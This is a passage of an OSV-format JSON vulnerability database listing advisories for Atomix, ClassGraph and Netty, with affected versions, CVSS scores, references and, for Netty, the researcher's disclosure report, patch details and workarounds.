"1.0.0-rc6", "1.0.0-rc7", "1.0.0-rc8", "1.0.0-rc9", "1.0.1", "1.0.1-rc1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "2.0.0", "2.0.0-alpha1", "2.0.0-raft-beta1", "2.0.0-raft-final", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.27", "2.0.28", "2.0.29", "2.0.3", "2.0.30", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.1.0-beta1", "2.1.0-beta2", "2.1.0-beta3", "3.0.0", "3.0.0-rc1", "3.0.0-rc10", "3.0.0-rc11", "3.0.0-rc12", "3.0.0-rc3", "3.0.0-rc4", "3.0.0-rc5", "3.0.0-rc6", "3.0.0-rc7", "3.0.0-rc8", "3.0.0-rc9", "3.0.1", "3.0.10", "3.0.11", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9", "3.1.0", "3.1.0-beta1", "3.1.0-beta2", "3.1.0-beta3", "3.1.0-beta4", "3.1.0-rc1", "3.1.0-rc2", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-4jhc-wjr3-pwh2/GHSA-4jhc-wjr3-pwh2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35211" }, { "type": "WEB", "url": "https://docs.google.com/presentation/d/1C_IpRfSU-9FMezcHCFZ-qg-15JO-W36yvqcnzI8sQs8/edit?usp=sharing" }, { "type": "PACKAGE", "url": "https://github.com/atomix/atomix" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2021-12-17T18:48:40Z", "nvd_published_at": "2021-12-16T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6vvh-5794-vpmj", "published": "2021-12-17T20:40:58Z", "modified": "2023-11-08T04:03:33.073526Z", "aliases": [ "CVE-2020-35216" ], "summary": "An issue in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false member down event messages.", "details": "An issue in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false member down event messages.", "affected": [ { "package": { "name": "io.atomix:atomix", "ecosystem": "Maven", "purl": "pkg:maven/io.atomix/atomix" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "3.1.5" } ] } ], "versions": [ "0.1.0-beta1", "0.1.0-beta2", "0.1.0-beta3", "0.1.0-beta4", "0.1.0-beta5", "1.0.0", "1.0.0-rc1", "1.0.0-rc2", "1.0.0-rc3", "1.0.0-rc4", "1.0.0-rc5", "1.0.0-rc6", "1.0.0-rc7", "1.0.0-rc8", "1.0.0-rc9", "1.0.1", "1.0.1-rc1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "2.0.0", "2.0.0-alpha1", "2.0.0-raft-beta1", "2.0.0-raft-final", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.27", "2.0.28", "2.0.29", "2.0.3", "2.0.30", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.1.0-beta1", "2.1.0-beta2", "2.1.0-beta3", "3.0.0", "3.0.0-rc1", "3.0.0-rc10", "3.0.0-rc11", "3.0.0-rc12", "3.0.0-rc3", "3.0.0-rc4", "3.0.0-rc5", "3.0.0-rc6", "3.0.0-rc7", "3.0.0-rc8", "3.0.0-rc9", "3.0.1", "3.0.10", "3.0.11", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9", "3.1.0", "3.1.0-beta1", "3.1.0-beta2", "3.1.0-beta3", "3.1.0-beta4", "3.1.0-rc1", "3.1.0-rc2", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-6vvh-5794-vpmj/GHSA-6vvh-5794-vpmj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35216" }, { "type": "WEB", "url": "https://docs.google.com/presentation/d/1woXwR3vciv7ltFan6LyK5vsWXmaUi8ArZonhk80Gr5U/edit?usp=sharing" }, { "type": "PACKAGE", "url": "https://github.com/atomix/atomix" } ], "database_specific": { "cwe_ids": [ "CWE-362" ], "github_reviewed": true, "github_reviewed_at": "2021-12-17T15:12:52Z", "nvd_published_at": "2021-12-16T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7fr2-94h7-ccg2", "published": "2021-12-17T20:41:33Z", "modified": "2024-12-03T06:08:49.974429Z", "aliases": [ "CVE-2020-35209" ], "summary": "An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to join a target cluster via providing configuration information.", "details": "An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to join a target cluster via providing configuration information.", "affected": [ { "package": { "name": "io.atomix:atomix", "ecosystem": "Maven", "purl": "pkg:maven/io.atomix/atomix" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "3.1.5" } ] } ], "versions": [ "0.1.0-beta1", "0.1.0-beta2", "0.1.0-beta3", "0.1.0-beta4", "0.1.0-beta5", "1.0.0", "1.0.0-rc1", "1.0.0-rc2", "1.0.0-rc3", "1.0.0-rc4", "1.0.0-rc5", "1.0.0-rc6", "1.0.0-rc7", "1.0.0-rc8", "1.0.0-rc9", "1.0.1", "1.0.1-rc1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "2.0.0", "2.0.0-alpha1", "2.0.0-raft-beta1", "2.0.0-raft-final", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.27", "2.0.28", "2.0.29", "2.0.3", "2.0.30", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.1.0-beta1", "2.1.0-beta2", "2.1.0-beta3", "3.0.0", "3.0.0-rc1", "3.0.0-rc10", "3.0.0-rc11", "3.0.0-rc12", "3.0.0-rc3", "3.0.0-rc4", "3.0.0-rc5", "3.0.0-rc6", "3.0.0-rc7", "3.0.0-rc8", "3.0.0-rc9", "3.0.1", "3.0.10", "3.0.11", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9", "3.1.0", "3.1.0-beta1", "3.1.0-beta2", "3.1.0-beta3", "3.1.0-beta4", "3.1.0-rc1", "3.1.0-rc2", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-7fr2-94h7-ccg2/GHSA-7fr2-94h7-ccg2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35209" }, { "type": "WEB", "url": "https://docs.google.com/presentation/d/1W5KU7ffh4dheR8iD54ulABImi6byAhSI-OhEKw2adRo/edit?usp=sharing" }, { "type": "PACKAGE", "url": "https://github.com/atomix/atomix" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2021-12-17T18:40:51Z", "nvd_published_at": "2021-12-16T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g7p8-r2ch-4rmf", "published": "2021-12-17T20:41:45Z", "modified": "2023-11-08T04:03:33.012848Z", "aliases": [ "CVE-2020-35215" ], "summary": "Malicious Atomix node queries expose sensitive information", "details": "An issue in Atomix v3.1.5 allows attackers to access sensitive information when a malicious Atomix node queries distributed variable primitives which contain the entire primitive lists that ONOS nodes use to share important states.", "affected": [ { "package": { "name": "io.atomix:atomix", "ecosystem": "Maven", "purl": "pkg:maven/io.atomix/atomix" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "3.1.5" } ] } ], "versions": [ "0.1.0-beta1", "0.1.0-beta2", "0.1.0-beta3", "0.1.0-beta4", "0.1.0-beta5", "1.0.0", "1.0.0-rc1", "1.0.0-rc2", "1.0.0-rc3", "1.0.0-rc4", "1.0.0-rc5", "1.0.0-rc6", "1.0.0-rc7", "1.0.0-rc8", "1.0.0-rc9", "1.0.1", "1.0.1-rc1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "2.0.0", "2.0.0-alpha1", "2.0.0-raft-beta1", "2.0.0-raft-final", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.27", "2.0.28", "2.0.29", "2.0.3", "2.0.30", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.1.0-beta1", "2.1.0-beta2", "2.1.0-beta3", "3.0.0", "3.0.0-rc1", "3.0.0-rc10", "3.0.0-rc11", "3.0.0-rc12", "3.0.0-rc3", "3.0.0-rc4", "3.0.0-rc5", "3.0.0-rc6", "3.0.0-rc7", "3.0.0-rc8", "3.0.0-rc9", "3.0.1", "3.0.10", "3.0.11", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9", "3.1.0", "3.1.0-beta1", "3.1.0-beta2", "3.1.0-beta3", "3.1.0-beta4", "3.1.0-rc1", "3.1.0-rc2", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-g7p8-r2ch-4rmf/GHSA-g7p8-r2ch-4rmf.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35215" }, { "type": "WEB", "url": "https://docs.google.com/presentation/d/1pRRLfdSUqUZ688CZ9e9AyceuXPGp9oyGj7j4bdSsBcw/edit?usp=sharing" }, { "type": "PACKAGE", "url": "https://github.com/atomix/atomix" } ], "database_specific": { "cwe_ids": [ "CWE-668" ], "github_reviewed": true, "github_reviewed_at": "2021-12-17T19:00:58Z", "nvd_published_at": "2021-12-16T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-m4h3-7mc2-v295", "published": "2021-12-17T20:41:21Z", "modified": "2024-12-03T05:58:28.108466Z", "aliases": [ "CVE-2020-35214" ], "summary": "An issue in Atomix v3.1.5 allows a malicious Atomix node to remove states of ONOS storage via abuse of primitive operations.", "details": "An issue in Atomix v3.1.5 allows a malicious Atomix node to remove states of ONOS storage via abuse of primitive operations.", "affected": [ { "package": { "name": "io.atomix:atomix", "ecosystem": "Maven", "purl": "pkg:maven/io.atomix/atomix" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "3.1.5" } ] } ], "versions": [ "0.1.0-beta1", "0.1.0-beta2", "0.1.0-beta3", "0.1.0-beta4", "0.1.0-beta5", "1.0.0", "1.0.0-rc1", "1.0.0-rc2", "1.0.0-rc3", "1.0.0-rc4", "1.0.0-rc5", "1.0.0-rc6", "1.0.0-rc7", "1.0.0-rc8", "1.0.0-rc9", "1.0.1", "1.0.1-rc1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "2.0.0", "2.0.0-alpha1", "2.0.0-raft-beta1", "2.0.0-raft-final", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.27", "2.0.28", "2.0.29", "2.0.3", "2.0.30", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.1.0-beta1", "2.1.0-beta2", "2.1.0-beta3", "3.0.0", "3.0.0-rc1", "3.0.0-rc10", "3.0.0-rc11", "3.0.0-rc12", "3.0.0-rc3", "3.0.0-rc4", "3.0.0-rc5", "3.0.0-rc6", "3.0.0-rc7", "3.0.0-rc8", "3.0.0-rc9", "3.0.1", "3.0.10", "3.0.11", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9", "3.1.0", "3.1.0-beta1", "3.1.0-beta2", "3.1.0-beta3", "3.1.0-beta4", "3.1.0-rc1", "3.1.0-rc2", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-m4h3-7mc2-v295/GHSA-m4h3-7mc2-v295.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35214" }, { "type": "WEB", "url": "https://docs.google.com/presentation/d/1wJi4QJko5ZCdADuzmAG9ed-nQLyJVkLBJf6cylAL71A/edit?usp=sharing" }, { "type": "PACKAGE", "url": "https://github.com/atomix/atomix" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2021-12-17T19:11:26Z", "nvd_published_at": "2021-12-16T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mf27-wg66-m8f5", "published": "2021-12-17T20:41:09Z", "modified": "2023-11-08T04:03:32.770438Z", "aliases": [ "CVE-2020-35210" ], "summary": "A vulnerability in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via a Raft session flooding attack using Raft OpenSessionRequest messages.", "details": "A vulnerability in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via a Raft session flooding attack using Raft OpenSessionRequest messages.", "affected": [ { "package": { "name": "io.atomix:atomix", "ecosystem": "Maven", "purl": "pkg:maven/io.atomix/atomix" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "3.1.5" } ] } ], "versions": [ "0.1.0-beta1", "0.1.0-beta2", "0.1.0-beta3", "0.1.0-beta4", "0.1.0-beta5", "1.0.0", "1.0.0-rc1", "1.0.0-rc2", "1.0.0-rc3", "1.0.0-rc4", "1.0.0-rc5", "1.0.0-rc6", "1.0.0-rc7", "1.0.0-rc8", "1.0.0-rc9", "1.0.1", "1.0.1-rc1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "2.0.0", "2.0.0-alpha1", "2.0.0-raft-beta1", "2.0.0-raft-final", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.27", "2.0.28", "2.0.29", "2.0.3", "2.0.30", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.1.0-beta1", "2.1.0-beta2", "2.1.0-beta3", "3.0.0", "3.0.0-rc1", "3.0.0-rc10", "3.0.0-rc11", "3.0.0-rc12", "3.0.0-rc3", "3.0.0-rc4", "3.0.0-rc5", "3.0.0-rc6", "3.0.0-rc7", "3.0.0-rc8", "3.0.0-rc9", "3.0.1", "3.0.10", "3.0.11", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9", "3.1.0", "3.1.0-beta1", "3.1.0-beta2", "3.1.0-beta3", "3.1.0-beta4", "3.1.0-rc1", "3.1.0-rc2", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-mf27-wg66-m8f5/GHSA-mf27-wg66-m8f5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35210" }, { "type": "WEB", "url": "https://docs.google.com/presentation/d/1eZznIciFI06_5UJrXvlLugH2-nmjfYpQO5NyNMc9RxU/edit?usp=sharing" }, { "type": "PACKAGE", "url": "https://github.com/atomix/atomix" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-12-17T17:20:09Z", "nvd_published_at": "2021-12-16T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v2xm-76pq-phcf", "published": "2024-06-21T06:31:12Z", "modified": "2024-06-25T02:34:01.955562Z", "aliases": [ "CVE-2021-47621" ], "related": [ "CGA-654j-wjm3-qmg4", "CGA-g2q2-9vqg-g6xm", "CGA-pq95-x78h-qx9r" ], "summary": "ClassGraph XML External Entity Reference", "details": "ClassGraph before 4.8.112 was not resistant to XML eXternal Entity (XXE) attacks.", "affected": [ { "package": { "name": "io.github.classgraph:classgraph", "ecosystem": "Maven", "purl": "pkg:maven/io.github.classgraph/classgraph" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.8.112" } ] } ], "versions": [ "4.0.0", "4.0.0-beta-11", "4.0.0-beta-12", "4.0.1", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.0.6", "4.0.7", "4.1.0", "4.1.1", "4.1.2", "4.1.3", "4.1.4", "4.1.5", "4.1.6", "4.1.7", "4.2.0", "4.2.1", "4.2.10", "4.2.11", "4.2.12", "4.2.2", "4.2.3", "4.2.4", "4.2.5", "4.2.6", "4.2.7", "4.2.8", "4.2.9", "4.3.0", "4.3.1", "4.4.0", "4.4.1", "4.4.10", "4.4.11", "4.4.12", "4.4.2", "4.4.3", "4.4.4", "4.4.5", "4.4.6", "4.4.7", "4.4.8", "4.4.9", "4.6.0", "4.6.1", "4.6.10", "4.6.11", "4.6.12", "4.6.13", "4.6.14", "4.6.15", "4.6.16", "4.6.17", "4.6.18", "4.6.19", "4.6.2", "4.6.20", "4.6.21", "4.6.22", "4.6.23", "4.6.24", "4.6.25", "4.6.26", "4.6.27", "4.6.28", "4.6.29", "4.6.3", "4.6.30", "4.6.31", "4.6.32", "4.6.4", "4.6.5", "4.6.6", "4.6.7", "4.6.8", "4.6.9", "4.8.0", "4.8.1", "4.8.10", "4.8.100", "4.8.101", "4.8.102", "4.8.103", "4.8.104", "4.8.105", "4.8.106", "4.8.107", "4.8.108", "4.8.109", "4.8.11", "4.8.110", "4.8.111", "4.8.12", "4.8.13", "4.8.14", "4.8.15", "4.8.16", "4.8.17", "4.8.19", "4.8.2", "4.8.20", "4.8.21", "4.8.22", "4.8.23", "4.8.24", "4.8.25", "4.8.26", "4.8.27", "4.8.28", "4.8.29", "4.8.3", "4.8.30", "4.8.31", "4.8.32", "4.8.33", "4.8.34", "4.8.35", "4.8.36", "4.8.37", "4.8.38", "4.8.39", "4.8.4", "4.8.40", "4.8.41", "4.8.42", "4.8.43", "4.8.44", "4.8.45", "4.8.46", "4.8.47", "4.8.48", "4.8.49", "4.8.5", "4.8.50", "4.8.51", "4.8.52", "4.8.53", "4.8.54", "4.8.55", "4.8.56", "4.8.57", "4.8.58", "4.8.59", "4.8.6", "4.8.60", "4.8.61", "4.8.62", "4.8.63", "4.8.64", "4.8.65", "4.8.66", "4.8.67", "4.8.68", "4.8.69", "4.8.7", "4.8.70", "4.8.71", "4.8.72", "4.8.73", "4.8.74", "4.8.75", "4.8.76", "4.8.77", "4.8.78", "4.8.79", "4.8.8", "4.8.80", "4.8.81", "4.8.82", "4.8.83", "4.8.84", "4.8.85", "4.8.86", "4.8.87", "4.8.88", "4.8.89", "4.8.9", "4.8.90", "4.8.91", "4.8.92", "4.8.93", "4.8.94", "4.8.95", "4.8.96", "4.8.97", "4.8.98" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-v2xm-76pq-phcf/GHSA-v2xm-76pq-phcf.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-47621" }, { "type": "WEB", "url": "https://github.com/classgraph/classgraph/pull/539" }, { "type": "WEB", "url": "https://github.com/classgraph/classgraph/commit/681362ad6b0b9d9abaffb2e07099ce54d7a41fa3" }, { "type": "WEB", "url": "https://docs.r3.com/en/platform/corda/4.8/enterprise/release-notes-enterprise.html" }, { "type": "PACKAGE", "url": "https://github.com/classgraph/classgraph" }, { "type": "WEB", "url": "https://github.com/classgraph/classgraph/releases/tag/classgraph-4.8.112" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2024-06-21T15:06:26Z", "nvd_published_at": "2024-06-21T06:15:10Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5mcr-gq6c-3hq2", "published": "2021-02-08T21:17:48Z", "modified": "2025-01-14T10:57:08.719345Z", "aliases": [ "CVE-2021-21290" ], "related": [ "CGA-5mv3-2mc9-76x5", "CGA-qrw9-p79v-r8f7", "CVE-2021-21290", "CVE-2022-24823" ], "summary": "Local Information Disclosure Vulnerability in Netty on Unix-Like systems", "details": "### Impact\n\nWhen netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled.\n\nThe CVSSv3.1 score of this vulnerability is calculated to be a [6.2/10](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\u0026version=3.1)\n\n### Vulnerability Details\n\nOn unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems.\n\nThe method `File.createTempFile` on unix-like systems creates a random file, but, by default will create this file with the permissions `-rw-r--r--`. Thus, if sensitive information is written to this file, other local users can read this information.\n\nThis is the case in netty's `AbstractDiskHttpData` is vulnerable.\n\nhttps://github.com/netty/netty/blob/e5951d46fc89db507ba7d2968d2ede26378f0b04/codec-http/src/main/java/io/netty/handler/codec/http/multipart/AbstractDiskHttpData.java#L80-L101\n\n`AbstractDiskHttpData` is used as a part of the `DefaultHttpDataFactory` class which is used by `HttpPostRequestDecoder` / `HttpPostMultiPartRequestDecoder`.\n\nYou may be affected by this vulnerability your project contains the following code patterns:\n\n```java\nchannelPipeline.addLast(new HttpPostRequestDecoder(...));\n```\n\n```java\nchannelPipeline.addLast(new HttpPostMultiPartRequestDecoder(...));\n```\n\n### Patches\n\nThis has been patched in version `4.1.59.Final`.\n\n### Workarounds\n\nSpecify your own `java.io.tmpdir` when you start the JVM or use `DefaultHttpDataFactory.setBaseDir(...)` to set the directory to something that is only readable by the current user.\n\n### References\n\n - [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html)\n - [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html)\n\n### Similar Vulnerabilities\n\nSimilar, but not the same.\n\n - JUnit 4 - https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp\n - Google Guava - https://github.com/google/guava/issues/4011\n - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945\n - JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [netty](https://github.com/netty/netty)\n* Email us [here](mailto:netty-security@googlegroups.com)\n\n### Original Report\n\n\u003e Hi Netty Security Team,\n\u003e \n\u003e I've been working on some security research leveraging custom CodeQL queries to detect local information disclosure vulnerabilities in java applications. This was the result from running this query against the netty project:\n\u003e https://lgtm.com/query/7723301787255288599/\n\u003e \n\u003e Netty contains three local information disclosure vulnerabilities, so far as I can tell.\n\u003e \n\u003e One is here, where the private key for the certificate is written to a temporary file.\n\u003e \n\u003e https://github.com/netty/netty/blob/e5951d46fc89db507ba7d2968d2ede26378f0b04/handler/src/main/java/io/netty/handler/ssl/util/SelfSignedCertificate.java#L316-L346\n\u003e \n\u003e One is here, where the certificate is written to a temporary file.\n\u003e \n\u003e https://github.com/netty/netty/blob/e5951d46fc89db507ba7d2968d2ede26378f0b04/handler/src/main/java/io/netty/handler/ssl/util/SelfSignedCertificate.java#L348-L371\n\u003e \n\u003e The final one is here, where the 'AbstractDiskHttpData' creates a temporary file if the getBaseDirectory() method returns null. I believe that 'AbstractDiskHttpData' is used as a part of the file upload support? If this is the case, any files uploaded would be similarly vulnerable.\n\u003e \n\u003e https://github.com/netty/netty/blob/e5951d46fc89db507ba7d2968d2ede26378f0b04/codec-http/src/main/java/io/netty/handler/codec/http/multipart/AbstractDiskHttpData.java#L91\n\u003e \n\u003e All of these vulnerabilities exist because `File.createTempFile(String, String)` will create a temporary file in the system temporary directory if the 'java.io.tmpdir' system property is not explicitly set. It is my understanding that when java creates a file, by default, and using this method, the permissions on that file utilize the umask. In a majority of cases, this means that the file that java creates has the permissions: `-rw-r--r--`, thus, any other local user on that system can read the contents of that file.\n\u003e \n\u003e Impacted OS:\n\u003e - Any OS where the system temporary directory is shared between multiple users. This is not the case for MacOS or Windows.\n\u003e \n\u003e Mitigation.\n\u003e \n\u003e Moving to the `Files` API instead will fix this vulnerability. \n\u003e https://docs.oracle.com/javase/8/docs/api/java/nio/file/Files.html#createTempFile-java.nio.file.Path-java.lang.String-java.lang.String-java.nio.file.attribute.FileAttribute...-\n\u003e \n\u003e This API will explicitly set the posix file permissions to something safe, by default.\n\u003e \n\u003e I recently disclosed a similar vulnerability in JUnit 4:\n\u003e https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp\n\u003e \n\u003e If you're also curious, this vulnerability in Jetty was also mine, also involving temporary directories, but is not the same vulnerability as in this case.\n\u003e https://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6\n\u003e \n\u003e I would appreciate it if we could perform disclosure of this vulnerability leveraging the GitHub security advisories feature here. GitHub has a nice credit system that I appreciate, plus the disclosures, as you can see from the sampling above, end up looking very nice.\n\u003e https://github.com/netty/netty/security/advisories\n\u003e \n\u003e This vulnerability disclosure follows Google's [90-day vulnerability disclosure policy](https://www.google.com/about/appsecurity/) (I'm not an employee of Google, I just like their policy). Full disclosure will occur either at the end of the 90-day deadline or whenever a patch is made widely available, whichever occurs first.\n\u003e \n\u003e Cheers,\n\u003e Jonathan Leitschuh", "affected": [ { "package": { "name": "io.netty:netty-codec-http", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.59.Final" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", 